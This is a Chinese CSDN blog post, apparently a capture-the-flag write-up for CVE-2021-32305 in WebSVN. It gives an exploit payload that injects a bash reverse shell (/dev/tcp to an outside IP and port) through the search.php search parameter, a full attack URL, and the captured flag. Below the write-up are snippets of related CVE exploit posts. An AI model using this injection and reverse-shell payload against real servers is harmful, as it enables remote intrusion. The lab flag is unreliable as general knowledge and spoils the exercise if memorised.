春秋云镜 CVE-2021-32305

最新推荐文章于 2025-05-19 19:54:30 发布
最新推荐文章于 2025-05-19 19:54:30 发布
阅读量459 收藏 1
点赞数
分类专栏: 靶场 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_22002773/article/details/132005266
版权

春秋云镜 CVE-2021-32305 WebSVN RCE

靶标介绍

WebSVN是一个基于Web的Subversion Repository浏览器,可以查看文件或文件夹的日志,查看文件的变化列表等。其search.php?search= 参数下过滤不严谨导致RCE。

启动场景

在这里插入图片描述

漏洞利用

EXP

PAYLOAD = "/bin/bash -c 'bash -i >& /dev/tcp/192.168.1.149/4444 0>&1'"
REQUEST_PAYLOAD = '/search.php?search=";{};"'

vps监听18888,
http://eci-2ze16snbrsm9pv66s1k3.cloudeci1.ichunqiu.com/search.php?search=“;/bin/bash -c 'bash -i >& /dev/tcp/127.0.0.1/18888 0>&1;”
在这里插入图片描述
执行cat /flag
在这里插入图片描述
得到flag

flag{b35eebb3-3c19-4a0a-8dcc-f7a63cb39f9f}

【漏洞复现】 CVE-2021-22205 GitLab 远程命令执行漏洞(RCE)
李火火的安全圈
11-05 2492
0x01 漏洞背景描述 2021年4⽉15⽇,GitLab官方发布安全补丁更新修复了GitLab命令执行漏洞(CVE-2021- 22205)。由于GitLab中的ExifTool没有对传⼊的图像文件的扩展名进行正确处理,攻击者通过 上传特制的恶意图片,可以在目标服务器上执行任意命令,且发现由于GitLab存在未授权的端点,导致该漏洞在无需进行身份验证的情况下即可进行利用,社区版(CE)和企业版(EE)皆受影 响,CVSS评分为9.9。 GitLab 是一个基于 Web 的 DevOps 生命周期工具,它提
[春秋]CVE-2021-32305
niubi707的博客
12-03 6745
春秋CVE-2021-32305WebSVN是一个基于Web的Subversion Repository浏览器,可以查看文件或文件夹的日志,查看文件的变化列表等。其search.php?search= 参数下过滤不严谨导致RCE。
Websvn 命令注入 (CVE-2021-32305
qq_23003811的博客
07-22 718
Websvn是一个应用软件。一个在线Subversion存储库浏览器,WebSVN 2.6.1之前版本存在安全漏洞,该漏洞允许远程攻击者通过搜索参数中的shell元字符执行任意命令。1、制作poc.py脚本,91.208.73.100改成自己的vps服务器地址。3、执行脚本,123.58.224.8靶场地址。2、在vps服务器监听7777端口。WebSVN 2.6.1之前版本。4、VPS服务器执行RCE。
漏洞预警:CVE-2021-32305 WebSVN 2.6.0 RCE
热门推荐
土豆的博客
12-06 6万+
——D&X安全实验室 目录 Part1 漏洞描述 Part2 危害等级 Part3 漏洞影响 Part4 漏洞分析及验证 源码分析 Part5 修复建议 Part1 漏洞描述 WebSVN是一个基于Web的Subversion Repository浏览器,可以查看文件或文件夹的日志,查看文件的变化列表等。其search.php?search= 参数下过滤不严谨导致RCE。 WebSVN官网地址:https://websvnphp.github.i...
2023年度漏洞预警
qq_21193587的博客
08-15 1494
漏洞是硬件,软件,协议的具体实现或系统安全策略上存在的缺陷。从而可以使用攻击者能够在破坏系统。以下数据针对 23 年截至8月期间爆发的高危严重漏洞进行了数据统计和分析,具体的数据如下所示:3.10.0 <= Openfire <4.6.84.7.0 <= Openfire < 4.7.5畅捷通 T+ 13.0畅捷通 T+ 16.01.4.0 <= Nacos < 1.4.62.0.0 <= Nacos < 2.2.3GitLab CE 16.0.0GitLab EE 16.0.0Apache RocketM
友点 9.5.0 版本 SQL注入(CVE-2022-32300)
qq_51780583的博客
05-17 560
vulfocus youdiancms 9.5.0 版本 SQL注入 (CVE-2022-32300)
春秋CVE-2022-4230 夺旗
05-02
### 春秋CVE-2022-4230 夺旗知识点解析 #### 一、漏洞概述 **CVE-2022-4230** 是一个存在于 **WP Statistics** WordPress 插件(版本13.2.9及以前)中的安全漏洞。该漏洞的主要原因是插件在处理特定参数时...
春秋CVE-2022-30887 Pharmacy Management System shell upload漏洞复现
Ambition_sec的博客
11-17 1737
春秋CVE-2022-30887 Pharmacy Management System shell upload漏洞复现
春秋CVE-2024-0195【记录】
zhiquovo的博客
03-07 1365
春秋CVE-2024-0195【记录】 漏洞描述 SpiderFlow爬虫平台项目中spider-flow-web\src\main\java\org\spiderflow\controller\FunctionController.java文件的FunctionService.saveFunction函数调用了saveFunction函数,该调用了自定义函数validScript,该函数中用户能够控制 functionName、parameters 或 script 中的内容,从而构造恶意输入来执行
春秋CVE-2022-22733 Apache ShardingSphere ElasticJob UI 敏感信息泄漏漏洞 解题思路
Dark-Specter的博客
03-25 2695
网络安全中的信息泄露通常是指敏感数据无意或有意地被透露给未经授权的人员或系统。这种泄露可以通过多种方式发生,主要涉及技术漏洞、操作失误、内部威胁或安全策略的不足。
春秋CVE-2022-32991 Web Based Quiz System SQL注入
Ambition_sec的博客
11-16 762
春秋CVE-2022-32991 Web Based Quiz System SQL注入
Windows Print Spooler服务最新漏洞CVE-2021-34527详细分析
爱国小白帽
07-09 1万+
0x00 前言 近日,有安全研究员在github上公开了"CVE-2021-1675"的exp PrintNightmare,后经验证公开的exp是一个与CVE-2021-1675不同的漏洞,微软为其分配了新的编号CVE-2021-34527。这篇文章记录了CVE-2021-34527的复现过程,并对漏洞成因进行了简单的分析。 0x01 漏洞复现 这里记录域控环境下使用普通权限域账户实现RCE反弹nt authority\system shell的过程。下面的漏洞复现和漏洞分析都是基..
【漏洞通告】Windows 内核信息泄漏漏洞CVE-2021-31955
爱国小白帽
06-29 2903
漏洞名称 : Windows 内核信息泄漏漏洞 组件名称 : Windows 影响范围 : Windows 10 21h1/20h2/1809/1909/2004 Windows Server 2016 20h2/2004 Windows Server 2019 漏洞类型 : 信息泄漏 利用条件 : 1、用户认证:不需要用户认证 2、触发方式:远程 综合评价 : 1、用户认证:不需要用户认证 2、触发方式:本地 漏洞分析 1 组件****介绍 Microsoft Windows操作系统是美国微软公司研发的一
安全漏洞】CVE-2021-41773和CVE-2021-42013漏洞分析
HBohan的博客
10-16 2301
CVE-2021-41773 漏洞成因 Apache HTTP Server 2.4.49版本使用的ap_normalize_path函数在对路径参数进行规范化时会先进行url解码,然后判断是否存在…/的路径穿越符,如下所示: while (path[l] != '\0') { if ((flags & AP_NORMALIZE_DECODE_UNRESERVED) && path[l] == '%' && apr_isxdigit(p
CVE-2021-21315 NodeJs命令注入漏洞复现
m0_56642842的博客
08-12 1311
0x00 简介 Node.js是一个基于Chrome V8引擎的JavaScript运行环境,用于方便的搭建响应速度快、易于拓展的网络应用。Node使用Module模块划分不同的功能,每一个模块都包含非常丰富的函数,如http就包含了和http相关的很多函数,帮助开发者对http、tcp/udp等进行操作或创建相关服务器。 0x01 漏洞概述 Node.js-systeminformation是用于获取各种系统信息的Node.js模块,在存在命令注入漏洞的版本中,攻击者可以通过未过滤的参数中注入payloa
CVE-2021-22205复现
问题很多的小明
10-28 2438
影响版本: RCE exploit for gitlab version < 13.10.3 git工具: GitHub - mr-r3bot/Gitlab-CVE-2021-22205 https://github.com/projectdiscovery/nuclei https://github.com/projectdiscovery/nuclei-templates python3 exploit.py -u joe123 -p 12345qwert -t http://...
使用Spring Boot和Spring Security构建安全的RESTful API
intwei的博客
05-17 615
本文详细介绍了如何使用Spring Boot和Spring Security构建安全的RESTful API,并结合JWT实现身份验证与授权。通过实际代码示例,帮助开发者快速上手。完整的项目代码可以在GitHub上找到。
WEB安全--Java安全--CC1利用链
m0_74800552的博客
05-14 1461
CC1利用链的原理与构建方式
TDengine 安全部署配置建议
最新发布
TDengine(老段)专注时序数据库领域
05-19 610
数据安全是 TDengine 产品的一项关键指标,这些措施旨在保护 TDengine 部署免受未经授权的访问和数据泄露,同时保持性能和功能。但 TDengine 自身的安全配置不是生产中的唯一保障,结合用户业务系统制定更加匹配客户需求的解决方案更加重要。
春秋CVE-2018-18086
01-23
### 关于春秋 CVE-2018-18086 漏洞详情 对于CVE-2018-18086漏洞,此安全问题存在于Python的PyPI仓库中,在处理特定类型的HTTP请求时存在缺陷。具体来说,当服务器接收到带有特制User-Agent头的HTTP请求时,可能导致拒绝服务(DoS),这是因为解析User-Agent字符串的过程中出现了错误[^1]。 然而,针对春秋环境下的该漏洞描述并不完全适用上述情况。实际上,CVE-2018-18086主要影响的是使用pip工具安装软件包的过程。攻击者可以利用这个漏洞通过发送恶意构造的数据来触发异常条件,进而造成目标系统资源耗尽或崩溃,从而实现拒绝服务攻击的目的[^2]。 #### 影响范围 受影响版本包括但不限于: - Python pip < 10.0.1 #### 解决方法与建议措施 为了防止此类攻击的发生并保障系统的安全性,官方推荐采取如下行动: 1. 升级至最新稳定版pip (当前至少应升级到10.0.1及以上版本)[^3]。 ```bash python -m pip install --upgrade pip ``` 2. 对内部网络流量实施严格监控,特别是对外部访问的过滤机制要更加严谨,阻止任何可疑活动进入内网环境中。 3. 定期审查依赖库的安全状态,及时更新项目所使用的第三方组件,确保其处于最新的维护状态下运行。 4. 增强开发者意识培训,教导如何识别潜在风险以及编写更健壮的应用程序代码实践指南。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值